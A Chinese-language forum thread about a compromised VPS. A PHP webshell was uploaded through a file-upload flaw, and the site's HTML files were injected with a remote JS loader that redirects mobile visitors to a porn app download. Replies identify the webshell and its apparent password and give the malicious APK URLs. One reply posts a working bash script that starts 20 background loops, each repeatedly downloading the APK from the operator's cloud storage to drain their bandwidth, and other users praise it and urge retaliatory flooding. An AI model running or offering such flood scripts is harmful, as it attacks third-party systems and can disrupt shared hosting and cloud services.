吃灰小鸡被挂马 文件找到了 大佬看下这个文件能干啥

laon 6天前 9

  1. https://paste.ubuntu.com/p/Hy886CZQC7/
PHP文件的木马
小鸡上网站所有HTML文件都被加上了一句加载JS的代码
  1. https://m.yymhs.cc/tj.js
最新回复 (22)
  • yxmss 6天前
    引用 2
    大马
    密码应该是:yzddmr6
    开源地址:https://github.com/AYZRxx1/BestShell
  • 楼主 laon 6天前
    引用 3
    yxmss 发表于 2021-1-13 19:07
    大马
    密码应该是:yzddmr6
    给我跳H网了,H网还用的阿里云CDN,我在剑皇了
  • 主菜单 6天前
    引用 4
    root密码被爆破了么,还是前端程序漏洞?
  • yxmss 6天前
    引用 5
    laon 发表于 2021-1-13 19:19
    给我跳H网了,H网还用的阿里云CDN,我在剑皇了
    那个js代码的作用是判断移动端设备跳转到http://1pvwjv1p.0avr4s.cn(PC端打不开,移动打开以后是H网)
  • 楼主 laon 6天前
    引用 6
    主菜单 发表于 2021-1-13 19:23
    root密码被爆破了么,还是前端程序漏洞?
    是前端程序的漏洞,我看到是通过一个文件上传漏洞上传的
  • ymh1147 6天前
    引用 7
    这个不是XX视频嘛,中招的还挺多
  • 楼主 laon 6天前
    引用 8
    yxmss 发表于 2021-1-13 19:23
    那个js代码的作用是判断移动端设备跳转到http://1pvwjv1p.0avr4s.cn(PC端打不开,移动打开以后是H网) ...
    感谢大佬解惑
  • yxmss 6天前
    引用 9
    laon 发表于 2021-1-13 19:25
    感谢大佬解惑
    它安装包下载地址,阿里云oss北京区的:http://apkpej86unv.oss-cn-beijing.aliyuncs.com/dy120_cmm.apk
  • 楼主 laon 6天前
    引用 10
    yxmss 发表于 2021-1-13 19:29
    它安装包下载地址,阿里云oss北京区的:http://apkpej86unv.oss-cn-beijing.aliyuncs.com/dy120_cmm.apk ...
    谢谢大佬,OSS刷起来比CDN快多了
  • cxmiao 6天前
    引用 11
    就是一个的大马
  • jqbaobao 6天前
    引用 12
    yxmss 发表于 2021-1-13 19:23
    那个js代码的作用是判断移动端设备跳转到http://1pvwjv1p.0avr4s.cn(PC端打不开,移动打开以后是H网) ...
    那这个要怎么cc呢,换ua吗
    【https://apkpej86unv.shzxfdc.com.cn//dy120_cmm.apk 】
  • 楼主 laon 6天前
    引用 13
    jqbaobao 发表于 2021-1-13 19:56
    那这个要怎么cc呢,换ua吗
    【https://apkpej86unv.shzxfdc.com.cn//dy120_cmm.apk 】
    他挂了CDN的,直接刷他的流量或者OSS
  • red233 6天前
    引用 14
    yxmss 发表于 2021-1-13 19:29
    它安装包下载地址,阿里云oss北京区的:http://apkpej86unv.oss-cn-beijing.aliyuncs.com/dy120_cmm.apk ...
    已经上鉴黄
  • 三和大神 6天前
    引用 15
    1. echo "while [ 1 ]" > _ins.sh
    2. echo "do" >> _ins.sh
    3. echo "wget -q -t0 -O /dev/null https://apkpej86unv.oss-cn-beijing.aliyuncs.com/dy120_cmm.apk" >> _ins.sh
    4. echo "done" >> _ins.sh
    5. for i in `seq 1 20`
    6. do
    7.    nohup bash _ins.sh > /dev/null 2>&1 &
    8.    echo "thread $i start!"
    9. done
    之前某位MJJ论坛发的剑皇Bash脚本
  • skysf 6天前
    引用 16
    三和大神 发表于 2021-1-13 20:30
    之前某位MJJ论坛发的剑皇Bash脚本
    这玩意启动了咋停止啊
  • ddane 6天前
    引用 17
    三和大神 发表于 2021-1-13 20:30
    之前某位MJJ论坛发的剑皇Bash脚本
    哈哈 真贴心 收藏了
  • Winter 5天前
    引用 18

    小鸡不行,20线程就爆CPU了
  • MSN 5天前
    引用 19
    laon 发表于 2021-1-13 04:19
    给我跳H网了,H网还用的阿里云CDN,我在剑皇了
    替我打500块钱的
  • Mrvps 5天前
    引用 20
    Winter 发表于 2021-1-14 13:53
    小鸡不行,20线程就爆CPU了
    这是嘛监控
  • Winter 5天前
    引用 21
    Mrvps 发表于 2021-1-14 14:19
    这是嘛监控
    FInalshell  挺好用的
  • 引用 22
    Mrvps 发表于 2021-1-14 14:19
    这是嘛监控
    finalsheel自带的
  • chinayang 5天前
    引用 23
    牛批啊,听得我瑟瑟发抖
  • 游客
    24
返回